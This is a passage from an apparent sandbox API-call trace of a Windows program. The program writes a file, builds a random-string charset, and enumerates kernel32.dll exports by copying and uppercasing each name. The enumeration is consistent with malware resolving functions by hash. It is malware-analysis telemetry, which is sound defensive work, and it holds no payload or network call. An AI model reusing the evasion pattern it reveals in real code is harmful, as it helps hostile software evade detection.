hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0085.428] CloseHandle (hObject=0x0) returned 0 [0085.428] CloseHandle (hObject=0x440) returned 1 [0085.428] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.428] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.428] GetTickCount () returned 0x114dd07 [0085.428] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.429] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.429] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.429] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.429] lstrlenA (lpString="kernel32.dll") returned 12 [0085.429] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.429] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.429] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.429] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.430] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.430] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.430] lstrlenA (lpString="ADDATOMA") returned 8 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.430] lstrlenA (lpString="ADDATOMW") returned 8 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.430] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.430] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.430] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.430] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.430] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.430] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.430] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.430] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.430] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.430] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.430] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.430] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.430] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.430] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.430] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.431] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.431] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.431] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.431] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.431] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.431] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.431] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.431] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.431] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.431] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.431] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.431] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.431] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.431] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.431] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.431] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.431] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.431] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.432] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.432] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.432] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.432] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.432] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.432] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.432] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.432] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.432] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.432] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.432] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.432] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.432] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.432] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.432] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.432] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.432] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.432] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.432] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.433] lstrlenA (lpString="BEEP") returned 4 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.433] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.433] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.433] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.433] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.433] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.433] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.433] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.433] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.433] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.433] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.433] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.433] lstrlenA (lpString="CANCELIO") returned 8 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.433] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.433] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.433] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.433] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.433] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.433] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.434] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.434] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.434] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.434] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.434] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.434] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.434] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.434] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.434] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.434] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.434] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.434] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.434] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.434] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.434] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.434] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.434] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.434] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.434] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.435] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.435] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.435] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.435] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.435] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.435] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.435] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.435] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.435] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.435] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.435] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.435] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.435] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.435] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.435] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.435] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.435] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.435] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.435] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.436] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.436] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.436] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.436] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.436] lstrlenA (lpString="COPYFILEA") returned 9 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.436] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.436] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.436] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.436] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 